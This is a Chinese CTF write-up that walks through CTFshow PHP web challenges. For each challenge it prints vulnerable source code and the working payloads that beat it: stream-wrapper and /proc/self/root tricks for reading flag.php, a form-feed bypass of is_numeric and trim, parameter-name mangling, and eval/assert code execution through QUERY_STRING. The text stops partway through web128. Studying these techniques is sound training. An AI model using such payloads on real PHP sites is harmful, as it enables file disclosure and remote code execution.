<p>方法1（用流包装器绕过 is_file）：本题正则没有过滤 compress 和 zlib。is_file() 对 compress.zlib:// 这类不支持 stat() 的包装器路径返回 false，而 highlight_file() 仍然可以经由该包装器读取目标文件，于是 is_file 这道检查形同虚设。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload:?file=compress.zlib:<span class="comment">//flag.php</span></span><br></pre></td></tr></table></figure>

<p>方法2:</p>
<p>知识点：</p>
<pre><code>在 Linux 中 /proc/self/root 是指向根目录的符号链接：在命令行中执行 ls /proc/self/root，显示的其实就是根目录下的内容。因此在路径里反复拼接 /proc/self/root 不会改变最终指向的文件，却会增加路径解析时需要跟随的软链接层数。多次重复后即可绕过 is_file()。大佬的解释是：软链接层数超过 20 次后 is_file() 的判断就会失败，而 highlight_file() 仍能读到文件内容（此处未自行验证，建议在本地复现确认具体阈值）。

顺带一提：新版 PHP 还有一个相关的小 Trick——require_once 包含软链接层数较多的路径时，"once" 的 hash 匹配会失效，造成重复包含（目录溢出）。它利用的同样是深层软链接，但本题代码只调用了 is_file() 和 highlight_file()，并没有用到 require_once。

参考：php源码分析 require_once 绕过不能重复包含文件的限制
</code></pre>
<p>方法：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">payload:?file=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/p</span><br><span class="line">roc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/pro</span><br><span class="line">c/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/</span><br><span class="line">self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/se</span><br><span class="line">lf/root/proc/self/root/var/www/html/flag.php</span><br></pre></td></tr></table></figure>



<h1 id="web114"><a href="#web114" class="headerlink" title="web114"></a>web114</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params"><span class="variable">$file</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/compress|root|zip|convert|\.\.\/|http|https|data|data|rot13|base64|string/i&#x27;</span>,<span class="variable">$file</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;hacker!&#x27;</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$file</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$file</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span 
class="line"><span class="keyword">echo</span> <span class="string">&quot;师傅们居然tql都是非预期 哼！&quot;</span>;</span><br><span class="line"><span class="keyword">if</span>(! is_file(<span class="variable">$file</span>))&#123;</span><br><span class="line">    highlight_file(filter(<span class="variable">$file</span>));</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;hacker!&quot;</span>;</span><br><span class="line">&#125; 师傅们居然tql都是非预期 哼！</span><br></pre></td></tr></table></figure>

<p><code> ?file=php://filter/resource=flag.php</code></p>
<h1 id="web115"><a href="#web115" class="headerlink" title="web115"></a>web115</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&#x27;flag.php&#x27;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params"><span class="variable">$num</span></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$num</span>=str_replace(<span class="string">&quot;0x&quot;</span>,<span class="string">&quot;1&quot;</span>,<span class="variable">$num</span>);</span><br><span class="line">    <span class="variable">$num</span>=str_replace(<span class="string">&quot;0&quot;</span>,<span class="string">&quot;1&quot;</span>,<span class="variable">$num</span>);</span><br><span class="line">    <span class="variable">$num</span>=str_replace(<span 
class="string">&quot;.&quot;</span>,<span class="string">&quot;1&quot;</span>,<span class="variable">$num</span>);</span><br><span class="line">    <span class="variable">$num</span>=str_replace(<span class="string">&quot;e&quot;</span>,<span class="string">&quot;1&quot;</span>,<span class="variable">$num</span>);</span><br><span class="line">    <span class="variable">$num</span>=str_replace(<span class="string">&quot;+&quot;</span>,<span class="string">&quot;1&quot;</span>,<span class="variable">$num</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$num</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$num</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(is_numeric(<span class="variable">$num</span>) <span class="keyword">and</span> <span class="variable">$num</span>!==<span class="string">&#x27;36&#x27;</span> <span class="keyword">and</span> trim(<span class="variable">$num</span>)!==<span class="string">&#x27;36&#x27;</span> <span class="keyword">and</span> filter(<span class="variable">$num</span>)==<span class="string">&#x27;36&#x27;</span>)&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$num</span>==<span class="string">&#x27;36&#x27;</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;hacker!!&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;hacker!!!&quot;</span>;</span><br><span class="line">&#125; 
hacker!!!</span><br></pre></td></tr></table></figure>

<p>知识点：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">is_numeric() 检测变量是否为数字或数字字符串（允许前导空白）</span><br><span class="line"></span><br><span class="line">trim() 去除字符串首尾处的空白字符（或者其他字符）。如果不指定第二个参数，trim() 默认只去除这些字符：</span><br><span class="line"></span><br><span class="line">    &quot; &quot; (ASCII 32 (0x20))，普通空格符。</span><br><span class="line">    &quot;\t&quot; (ASCII 9 (0x09))，制表符。</span><br><span class="line">    &quot;\n&quot; (ASCII 10 (0x0A))，换行符。</span><br><span class="line">    &quot;\r&quot; (ASCII 13 (0x0D))，回车符。</span><br><span class="line">    &quot;\0&quot; (ASCII 0 (0x00))，空字节符（空字符）。</span><br><span class="line">    &quot;\x0B&quot; (ASCII 11 (0x0B))，垂直制表符。</span><br><span class="line">    注意：换页符 &quot;\f&quot; (ASCII 12 (0x0C)，即 %0c) 不在这个默认列表里，trim() 不会去掉它；但 is_numeric() 和数字比较会把它当作前导空白跳过——这个不一致正是本题的突破口。</span><br><span class="line"></span><br><span class="line">chr() 返回 ASCII 码所对应的单个字符。</span><br><span class="line"></span><br><span class="line">此函数与 ord() 互补：ord() 把字符串第一个字节转换为 0-255 之间的整数，chr() 则反过来由整数得到字符。</span><br></pre></td></tr></table></figure>

<p>分析：</p>
<p>is_numeric($num) 要求 num 能被识别为数字或数字字符串，同时 $num 不能全等于 '36'；</p>
<p>trim($num)!=='36' 要求去掉首尾空白后也不能全等于 '36'，然后经过 filter() 替换后要弱等于 '36'；</p>
<p>最后 $num=='36' 要求原始输入弱等于 '36'——对数字字符串而言这是数值比较，前导空白会被忽略。</p>
<p>如何绕过is_numeric()和trim()? Fuzz测试一下</p>
<p>测试is_numeric</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">for ($i=0; $i &lt;128 ; $i++) &#123;</span><br><span class="line">	$x=chr($i).&#x27;36&#x27;;</span><br><span class="line">	if(is_numeric($x)===true)&#123;</span><br><span class="line">		echo urlencode(chr($i)).&quot;\n&quot;;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">//输出%09 %0A %0B %0C %0D + %2B - . 0 1 2 3 4 5 6 7 8 9</span><br></pre></td></tr></table></figure>

<p>测试trim和numeric</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">for($i=0;$i&lt;=128;$i++) &#123;</span><br><span class="line">	$x=chr($i).&#x27;36&#x27;;</span><br><span class="line">	if(trim($x)!==&#x27;36&#x27; &amp;&amp;is_numeric($x))&#123;</span><br><span class="line">		echo urlencode(chr($i)).&quot;\n&quot;;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">//输出结果%0C %2B - . 0 1 2 3 4 5 6 7 8 9</span><br></pre></td></tr></table></figure>

<p>逐个排除：前置数字 0-9（如 036、136）虽能通过 is_numeric 和 trim，但经 filter() 后得到的字符串不等于 36；+ - . 会被 filter() 替换成 1，同样过不了；只剩下 %0c，也就是换页符 \f——它不在 trim() 的默认去除列表里（所以 trim 后仍 !== '36'），却被数字比较当作前导空白，于是 "\f36"=='36' 成立。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload:?num=%0c36</span><br></pre></td></tr></table></figure>

<p>对于绕过，如果不知道怎么绕过就拿ASCII码把所有字符跑一遍</p>
<h1 id="web123"><a href="#web123" class="headerlink" title="web123"></a>web123</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"><span class="variable">$a</span>=<span class="variable">$_SERVER</span>[<span class="string">&#x27;argv&#x27;</span>];</span><br><span class="line"><span class="variable">$c</span>=<span class="variable">$_POST</span>[<span class="string">&#x27;fun&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;CTF_SHOW&#x27;</span>])&amp;&amp;<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;CTF_SHOW.COM&#x27;</span>])&amp;&amp;!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;fl0g&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\&#123;|\&#125;|\&quot;|\&#x27;|\,|\.|\;|\?/&quot;</span>, 
<span class="variable">$c</span>)&amp;&amp;<span class="variable">$c</span>&lt;=<span class="number">18</span>)&#123;</span><br><span class="line">         <span class="keyword">eval</span>(<span class="string">&quot;<span class="subst">$c</span>&quot;</span>.<span class="string">&quot;;&quot;</span>);  </span><br><span class="line">         <span class="keyword">if</span>(<span class="variable">$fl0g</span>===<span class="string">&quot;flag_give_me&quot;</span>)&#123;</span><br><span class="line">             <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">         &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<p>此处的 PHP 特性：PHP 变量名只能由字母、数字和下划线组成，所以无论是 GET 还是 POST，PHP 在注册请求变量时都会把参数名里的空格、点、以及未闭合的 [ 转换成下划线（+ 会先被 URL 解码成空格再转换）。但这个转换有个特性可以利用：一旦出现了第一个 [，后面的点就不会再被转换了，例如 CTF[SHOW.COM =&gt; CTF_SHOW.COM，这样就能构造出含有点号的键名 CTF_SHOW.COM。</p>
<p><code>payload：CTF_SHOW=1&amp;CTF[SHOW.COM=1&amp;fun=echo $flag</code></p>
<h1 id="web125"><a href="#web125" class="headerlink" title="web125"></a>web125</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"><span class="variable">$a</span>=<span class="variable">$_SERVER</span>[<span class="string">&#x27;argv&#x27;</span>];</span><br><span class="line"><span class="variable">$c</span>=<span class="variable">$_POST</span>[<span class="string">&#x27;fun&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;CTF_SHOW&#x27;</span>])&amp;&amp;<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;CTF_SHOW.COM&#x27;</span>])&amp;&amp;!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;fl0g&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span 
class="string">&quot;/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\&#123;|\&#125;|\&quot;|\&#x27;|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print/i&quot;</span>, <span class="variable">$c</span>)&amp;&amp;<span class="variable">$c</span>&lt;=<span class="number">16</span>)&#123;</span><br><span class="line">         <span class="keyword">eval</span>(<span class="string">&quot;<span class="subst">$c</span>&quot;</span>.<span class="string">&quot;;&quot;</span>);</span><br><span class="line">         <span class="keyword">if</span>(<span class="variable">$fl0g</span>===<span class="string">&quot;flag_give_me&quot;</span>)&#123;</span><br><span class="line">             <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">         &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/reserved.variables.argv.php">$argv</a>：传递给脚本的参数数组</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/luomir/p/5129875.html">详解 $_SERVER 函数中QUERY_STRING和REQUEST_URI区别(转)</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">$_SERVER[&#x27;argv&#x27;]：</span><br><span class="line"></span><br><span class="line">1、cli模式（命令行）下</span><br><span class="line"></span><br><span class="line">	第一个参数$_SERVER[&#x27;argv&#x27;][0]是脚本名，其余的是传递给脚本的参数</span><br><span class="line"></span><br><span class="line">2、web网页模式下</span><br><span class="line"></span><br><span class="line">	在web页模式下必须在php.ini开启register_argc_argv配置项</span><br><span class="line">	</span><br><span class="line">    设置register_argc_argv = On(默认是Off)，重启服务，$_SERVER[‘argv’]才会有效果</span><br><span class="line"></span><br><span class="line">    这时候的$_SERVER[‘argv’][0] = $_SERVER[‘QUERY_STRING’]</span><br><span class="line"></span><br><span class="line">    $argv,$argc在web模式下不适用</span><br></pre></td></tr></table></figure>

<p>我们是在网页模式下的，注意重点：<br> <code>$_SERVER[‘argv’][0] = $_SERVER[‘QUERY_STRING’]</code><br> 而 <code>$_SERVER[‘QUERY_STRING’]</code> <strong>是获取查询语句，也就是?后面的语句</strong></p>
<p>举个例子</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?$fl0g=flag_give_me</span><br><span class="line">$a[0]=$_SERVER[&#x27;argv&#x27;][0]=$_SERVER[‘QUERY_STRING’]=&gt;$fl0g=flag_give_me</span><br></pre></td></tr></table></figure>

<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">CTF_SHOW=1&amp;CTF[SHOW.COM=1&amp;fun=eval($a[0]) # POST</span><br><span class="line">?$fl0g=flag_give_me; #GET</span><br><span class="line">CTF_SHOW=6&amp;CTF[SHOW.COM=6&amp;fun=highlight_file($_GET[1])    #POST</span><br><span class="line">?1=flag.php		#GET</span><br></pre></td></tr></table></figure>



<h1 id="web126"><a href="#web126" class="headerlink" title="web126"></a>web126</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"><span class="variable">$a</span>=<span class="variable">$_SERVER</span>[<span class="string">&#x27;argv&#x27;</span>];</span><br><span class="line"><span class="variable">$c</span>=<span class="variable">$_POST</span>[<span class="string">&#x27;fun&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;CTF_SHOW&#x27;</span>])&amp;&amp;<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;CTF_SHOW.COM&#x27;</span>])&amp;&amp;!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;fl0g&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span 
class="string">&quot;/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\&#123;|\&#125;|\&quot;|\&#x27;|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print|g|i|f|c|o|d/i&quot;</span>, <span class="variable">$c</span>) &amp;&amp; strlen(<span class="variable">$c</span>)&lt;=<span class="number">16</span>)&#123;</span><br><span class="line">         <span class="keyword">eval</span>(<span class="string">&quot;<span class="subst">$c</span>&quot;</span>.<span class="string">&quot;;&quot;</span>);  </span><br><span class="line">         <span class="keyword">if</span>(<span class="variable">$fl0g</span>===<span class="string">&quot;flag_give_me&quot;</span>)&#123;</span><br><span class="line">             <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">         &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>与上一题相比的差别：正则新增了 g|i|f|c|o|d 六个字母（不区分大小写），长度判断也从 $c&lt;=16 改成了 strlen($c)&lt;=16。注意 ; 在前几题中本来就在黑名单里；而且这个正则只检查 POST 的 fun 参数，GET 查询串并不经过它。</p>
<p>我们可以使用 assert() 绕过：函数名 assert 和 $a[0] 都不含被禁的 g/i/f/c/o/d 字母，整个 fun 只有 13 个字符，满足 strlen($c)&lt;=16；真正要执行的代码则放在不经过正则检查的 GET 查询串里。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">assert() 断言：</span><br><span class="line"></span><br><span class="line">PHP 5</span><br><span class="line">bool assert ( mixed $assertion [, string $description ] )</span><br><span class="line"></span><br><span class="line">PHP 7</span><br><span class="line">bool assert ( mixed $assertion [, Throwable $exception ] )</span><br><span class="line"></span><br><span class="line">如果 assertion 是字符串，它将会被 assert() 当做 PHP 代码来执行</span><br><span class="line">可见，eval 和 assert 都可以把字符串当作代码执行，只不过 assert 把字符串当作一个表达式求值，不需要严格遵从语句语法，比如末尾的分号可以不加</span><br><span class="line">注意：PHP 8 起 assert() 不再把字符串参数当作代码执行，这一手法只对 PHP 7 及更早版本有效</span><br><span class="line">?$fl0g=flag_give_me</span><br><span class="line">CTF_SHOW=6&amp;CTF[SHOW.COM=6&amp;fun=assert($a[0])</span><br></pre></td></tr></table></figure>



<h1 id="web127"><a href="#web127" class="headerlink" title="web127"></a>web127</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line"></span><br><span class="line">error_reporting(0);</span><br><span class="line">include(&quot;flag.php&quot;);</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">$ctf_show = md5($flag);</span><br><span class="line">$url = $_SERVER[&#x27;QUERY_STRING&#x27;];</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">//特殊字符检测</span><br><span class="line">function waf($url)&#123;</span><br><span class="line">    if(preg_match(&#x27;/\`|\~|\!|\@|\#|\^|\*|\(|\)|\\$|\_|\-|\+|\&#123;|\;|\:|\[|\]|\&#125;|\&#x27;|\&quot;|\&lt;|\,|\&gt;|\.|\\\|\//&#x27;, $url))&#123;</span><br><span class="line">        return true;</span><br><span class="line">    &#125;else&#123;</span><br><span class="line">        return false;</span><br><span class="line">    &#125;</span><br><span 
class="line">&#125;</span><br><span class="line"></span><br><span class="line">if(waf($url))&#123;</span><br><span class="line">    die(&quot;嗯哼？&quot;);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    extract($_GET);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if($ctf_show===&#x27;ilove36d&#x27;)&#123;</span><br><span class="line">    echo $flag;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.runoob.com/php/func-array-extract.html">extract(提取、抽取)函数</a>：把数组的键名注册为同名变量，通常结合数组使用。这里对不可信的 $_GET 调用 extract()，意味着请求方可以覆盖脚本里任何已有变量（包括 $ctf_show），这就是本题漏洞的根源；waf() 只是前置的黑名单过滤，而且它检查的是未经 URL 解码的原始 $_SERVER['QUERY_STRING']。</p>
<p>直接 ?ctf_show=ilove36d 行不通：下划线 _ 在黑名单里。思路是利用 PHP 注册变量时会把参数名中的空格、点、[ 等字符转换为下划线的特性，用别的字符"拼"出 ctf_show，同时这些字符（或其 URL 编码形式）不能被 waf 命中。</p>
<p>自己写个fuzz脚本跑一下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">function waf($num)&#123;</span><br><span class="line">    if(preg_match(&#x27;/\`|\~|\!|\@|\#|\^|\*|\(|\)|\\$|\_|\-|\+|\&#123;|\;|\:|\[|\]|\&#125;|\&#x27;|\&quot;|\&lt;|\,|\&gt;|\.|\\\|\//&#x27;, $num))&#123;</span><br><span class="line">        return false;</span><br><span class="line">    &#125;else&#123;</span><br><span class="line">        return true;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">for($i = 0; $i&lt;129; $i++)&#123;</span><br><span class="line">	$num=chr($i);</span><br><span class="line">	if(waf($num))&#123;</span><br><span class="line">		echo &quot;未编码：&quot;.$num.&quot;   经过编码：&quot;.urlencode(chr($i)).&quot;\n&quot;;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这里的目的是利用 PHP 会把参数名里的空格、点、[、+ 自动转换为下划线的特性。fuzz 结果里空格是可用的，但 urlencode() 遵循表单编码规则把空格编码成 +，而 + 正好在黑名单里，所以脚本打印出的是 +；改用 rawurlencode() 风格的 %20 即可：waf() 看到的原始 QUERY_STRING 是 ctf%20show=ilove36d，不含任何黑名单字符；PHP 解码后得到键名 "ctf show"，再转换成 ctf_show，于是 extract($_GET) 覆盖了 $ctf_show。（点和 [ 本身都在黑名单里，所以只能用空格。）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ctf%20show=ilove36d</span><br></pre></td></tr></table></figure>



<h1 id="web128"><a href="#web128" class="headerlink" title="web128"></a>web128</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$f1</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;f1&#x27;</span>];</span><br><span class="line"><span class="variable">$f2</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;f2&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(check(<span class="variable">$f1</span>))&#123;</span><br><span class="line">    var_dump(call_user_func(call_user_func(<span class="variable">$f1</span>,<span class="variable">$f2</span>)));</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;嗯哼？&quot;</span>;</span><br><span 
